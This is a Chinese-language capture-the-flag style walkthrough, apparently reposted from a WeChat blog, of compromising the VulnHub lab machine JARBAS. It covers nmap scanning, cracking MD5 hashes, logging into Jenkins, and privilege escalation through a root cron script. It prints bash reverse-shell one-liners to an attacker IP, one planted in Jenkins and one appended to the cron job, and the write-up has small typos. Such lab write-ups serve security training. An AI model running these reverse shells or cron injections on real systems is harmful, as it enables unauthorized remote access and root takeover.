阅读须知
技术文章仅供参考,此文所提供的信息仅用于学习,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
我们进行红队靶场系列,vulnhub靶机中的JARBAS
选用工具:
VM17 官网下载kali 2023.3版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.3/靶场文件 https://download.vulnhub.com/jarbas/Jarbas.zip
前期准备工作搞定后,我们继续。
-
主机发现
同样使用 arp-scan
sudo arp-scan -l
-
NMAP标准四件套
-
端口扫描
-
详细扫描(版本检测)
-
udp扫描
-
漏洞初探
a.端口扫描
sudo nmap -sT --min-rate 10000 -p- 172.30.146.224 -oA nmapscan/ports
有80端口,我们就应该优先看它。
b.详细扫描
sudo nmap -sT -sV -sC -O -p22,80,3306,8080 172.30.146.224 -oA nmapscan/detail
c.udp扫描
sudo nmap -sU --top-ports 20 172.30.146.224 -oA nmapscan/udp
d.漏洞初探
sudo nmap --script=vuln -p21,22,80,3306 172.30.158.173 -oA nmapscan/vuln
通过这nmap的四次探测,我们可以得到下面的这些信息:
80,是 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
8080,存在robots.txt文件,可以看看是否存在提示信息
3306,mysql
22,ssh
udp存在可能一个68端口
目标靶机为Linux
好的,我们优先看80和8080,这两个web站。
-
渗透过程
80端口
8080端口
我们看到这左上角存在一个图标和“Jenkins”可能是一种系统的名字,我们上网查一下这是什么系统,会不会有漏洞存在。
注:一般公开的系统都会存在历史漏洞,我们是看公开的漏洞在这个系统上是否存在、是否被打补丁。
先进行网站的目录扫描,系统在跑的同时进行查询
查询结果如下:
使用 searchsploit 进行查询
searchsploit jenkins
先放着,看下目录扫描的情况如何。
根据PHP网站可能存在的后缀增加的、同时使用的是大字典
dirb http://172.30.146.224/ -X .html .php /usr/share/wordlists/dirb/big.txt访问一下assess.html网页
发现了md5的加密,这会是账号密码吗?
进行解密
对于这三组密码,我们优先试8080端口的,不行再试ssh。
在试到第三组的时候,成功登入系统
访问robots.txt:(在nmap扫描中存在)
看样子 "build"这个好像有用,先放着。
现在重点就是对该系统进行渗透了。
查看该系统版本
curl -s -I http://172.30.146.224:8080| grep X-Jenkins
在查询之后,进行尝试,如下
作为渗透人员,看到这个,真是相当兴奋。
在输入框中用bin/bach 写入反弹shell命令
bin/bach -i >& /dev/tcp/172.30.150.159/4444 0>&1
保存文件,同时在kali上调用nc开始监听。
可以看到反弹成功(虽然是半交互的shell)。
输入sudo 无法执行,
使用etc/passwd 查看其它用户
尝试使用eder账号密码(md5解密时的)进行ssh登录,失败。
尝试使用定时任务,存在。
框中意味着每5分钟以 root 的权限执行一次定时任务。
接下来就是将命令写入该文件,进行提权。
先查看一下,发现就是对日志文件执行一个删除操作。
echo '/bin/bash -i >& /dev/tcp/172.30.150.159/4445 0>&1' /etc/script/CleaningScript.sh
可以看到,将命令成功追加到了定时文件中,并成功进行了执行。
好的,顺利结束。
我们先是进行对80目录扫描、发现了8080的账号密码,进入Jenkins的系统中,在网络中检索找到漏洞点,并成功进行反弹shell。后利用计划任务进行提权,并成功得到flag。
原文始发于微信公众号(Glass的网安笔记):【红队靶机系列】-- JARBAS
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论